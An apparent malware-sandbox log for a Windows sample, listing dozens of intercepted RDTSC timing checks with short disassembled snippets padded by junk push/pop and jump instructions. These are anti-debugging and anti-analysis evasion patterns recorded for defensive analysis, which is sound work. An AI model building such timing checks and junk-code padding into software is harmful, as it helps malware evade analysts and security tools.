                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702BA0 second address: 702BAA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702CB8 second address: 702CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702CBC second address: 702CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b je 00007F66C0B351FCh 0x00000011 mov edx, dword ptr [ebp+122D1C4Fh] 0x00000017 push 00000004h 0x00000019 add edi, dword ptr [ebp+122D1C27h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007F66C0B351F8h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB46F second address: 6EB474 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD43C second address: 6CD442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD442 second address: 6CD44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740130 second address: 740136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740136 second address: 740142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740142 second address: 740148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740148 second address: 74014D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74014D second address: 740170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F66C0B35206h 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7402BC second address: 7402D8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66C0B35946h 0x00000008 jmp 00007F66C0B3594Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7402D8 second address: 7402E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F66C0B351F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7402E2 second address: 7402FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35955h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740596 second address: 7405A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F66C0B351F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7405A2 second address: 7405B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B3594Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7405B6 second address: 7405C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7405C1 second address: 7405C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7405C7 second address: 7405D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740708 second address: 74070E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74070E second address: 740712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740712 second address: 74071B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743C26 second address: 743C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743C2C second address: 743C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F66C0B35946h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746084 second address: 746088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746088 second address: 7460C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35955h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F66C0B35959h 0x00000011 js 00007F66C0B35946h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7460C6 second address: 7460DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F66C0B351FAh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7460DA second address: 7460DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BA52 second address: 74BA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C67E8 second address: 6C6805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35959h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C6805 second address: 6C680F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66C0B351F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C680F second address: 6C6823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66C0B3594Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A553 second address: 74A573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35204h 0x00000009 jl 00007F66C0B351F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A573 second address: 74A580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F66C0B35948h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A580 second address: 74A5B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f ja 00007F66C0B3520Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A5B6 second address: 74A5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F66C0B35946h 0x0000000a jo 00007F66C0B35946h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74AB13 second address: 74AB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74AB17 second address: 74AB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74AC75 second address: 74AC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B338 second address: 74B369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F66C0B35953h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 jl 00007F66C0B35946h 0x0000001c jg 00007F66C0B35946h 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EDD9 second address: 74EDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E988 second address: 74E98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E98C second address: 74E990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E990 second address: 74E9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F66C0B3594Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EAEE second address: 74EB0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66C0B35203h 0x00000009 jne 00007F66C0B351F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751562 second address: 751568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751568 second address: 751577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F66C0B351F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751577 second address: 75157B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75157B second address: 75158C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jng 00007F66C0B351F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7554DE second address: 7554E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7554E2 second address: 7554E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7554E8 second address: 7554F5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66C0B35948h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7554F5 second address: 75550F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F66C0B35201h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75550F second address: 755519 instructions: 0x00000000 rdtsc 0x00000002 js 00007F66C0B3594Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7602BC second address: 7602D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F66C0B351F6h 0x0000000a popad 0x0000000b ja 00007F66C0B351FEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75ED8F second address: 75EDA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35950h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EDA4 second address: 75EDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F66C0B35203h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EEF2 second address: 75EF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007F66C0B35946h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EF03 second address: 75EF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EF09 second address: 75EF20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B3594Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F1CC second address: 75F1E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jbe 00007F66C0B351F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F66C0B35200h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F39E second address: 75F3B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F66C0B3594Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F3B0 second address: 75F3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F3B9 second address: 75F3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F3BF second address: 75F3D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702E3B second address: 702E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F66C0B35946h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702E4A second address: 702E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702E54 second address: 702E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702E58 second address: 702EA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+1247ECF0h], edi 0x00000011 mov ebx, dword ptr [ebp+1248AFB4h] 0x00000017 mov dword ptr [ebp+122D1BDBh], ecx 0x0000001d add eax, ebx 0x0000001f nop 0x00000020 jmp 00007F66C0B351FFh 0x00000025 push eax 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jno 00007F66C0B351F6h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75FFF7 second address: 760010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F66C0B35946h 0x0000000a js 00007F66C0B35946h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007F66C0B35946h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760010 second address: 760014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C178B second address: 6C1790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1790 second address: 6C17A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66C0B351FAh 0x0000000d jnl 00007F66C0B351F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C17A8 second address: 6C17AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C17AC second address: 6C17B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765D63 second address: 765D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007F66C0B35946h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765D75 second address: 765DA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F66C0B351F6h 0x00000009 jne 00007F66C0B351F6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F66C0B351F6h 0x00000018 jmp 00007F66C0B35207h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765DA4 second address: 765DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7663BC second address: 7663C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76694C second address: 76695C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66C0B35946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76695C second address: 766967 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F66C0B351F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766EFD second address: 766F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766F02 second address: 766F33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FEh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jne 00007F66C0B351F6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 jmp 00007F66C0B351FCh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766F33 second address: 766F3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66C0B35946h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76B69A second address: 76B6B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F66C0B35200h 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76B6B4 second address: 76B6C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B3594Ch 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779F9B second address: 779FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F66C0B35202h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778BE0 second address: 778BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778CF4 second address: 778D0A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F66C0B351FCh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778FBA second address: 778FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778FC0 second address: 778FE6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F66C0B351FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F66C0B351FCh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F815 second address: 77F849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F66C0B35953h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F66C0B35957h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DAA4 second address: 78DAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DAAD second address: 78DAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DAB1 second address: 78DAD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007F66C0B35208h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D50D second address: 78D51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jg 00007F66C0B35946h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F70C second address: 78F712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F712 second address: 78F716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F716 second address: 78F733 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F66C0B35207h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F2C9 second address: 79F2EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F66C0B35956h 0x00000010 rdtsc
